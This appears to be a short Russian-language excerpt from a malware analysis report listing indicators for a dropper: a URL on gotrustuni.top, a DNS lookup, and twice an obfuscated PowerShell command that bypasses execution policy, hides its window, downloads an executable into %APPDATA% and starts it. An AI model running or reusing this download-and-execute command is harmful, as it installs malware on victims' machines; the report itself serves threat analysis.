Техническая информация
- http://gotrustuni.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poweRSHeLl.eXE -eXEcUtIOnPoLiCy bYPasS -NOPRofILe -WiNDOWStYLE HIdden (NEW-OBjecT sYStEm.nET.weBclIENt).DoWnLOAdFilE('http://gotrustuni.top/search.php','%APPdatA%.exE');sTAR...
- DNS ASK go###stuni.top
- '<SYSTEM32>\cmd.exe' /c "poweRSHeLl.eXE -eXEcUtIOnPoLiCy bYPasS -NOPRofILe -WiNDOWStYLE HIdden (NEW-OBjecT sYStEm.nET.weBclIENt).DoWnLOAdFilE('http://gotrustuni.top/search.php','%APPdatA%.exE');sTAR...' (со скрытым окном)